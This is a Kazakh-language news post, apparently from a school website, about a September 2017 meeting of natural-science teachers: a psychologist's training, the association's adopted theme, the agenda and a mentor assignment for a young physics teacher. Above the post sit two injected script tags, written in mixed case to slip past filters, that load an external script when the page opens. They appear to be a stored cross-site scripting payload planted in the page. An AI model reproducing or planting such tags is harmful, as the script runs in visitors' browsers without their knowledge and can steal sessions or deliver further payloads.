<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.09.2017

2017 жылдың 28-ші қыркүйек күні Жаратылыстану пәндерінің Әдістемелік бірлестіктің отырысы болды. Отырыс басталмай жатып мектебіміздің психологы Топаева Айнур «Сағат тілі» атты тренинг өткізіп, көңіл күй көтеріліп қалды. Әдістемелік бірлестіктің мұғалімдері бірлесе отырып, әдістемелік бірлестіктің тақырыбын анықтадық. «Оқытудың жаңа иновациялық өзгерістерін енгізу арқылы ой- өрісі дамыған, шығармашыл құзіретті жеке тұлғаны қалыптастыру» тақырыбы бекітілді.

Отырыста төмендегідей сұрақтар қарастырылды:

1. Әдістемелік бірлестік тақырыбын талдап, жұмыс жоспарын жасақтау.

2. Олимпиадаға қатысатын оқушылар тізімін анықтау, дарынды және қабілетті оқушылар мен жұмыс жоспарын талқылау.

3. Аттестация өтетін мұғалімдер.

Сонымен қатар жас маман Аканова Аякөзге физика пәнінің мұғалімі Оразбаева Багила Мукашевна тәлімгер етіп тағайындалды.

Просмотров: 603


Пікір қосу



Деректерді қолтаңбаға қосу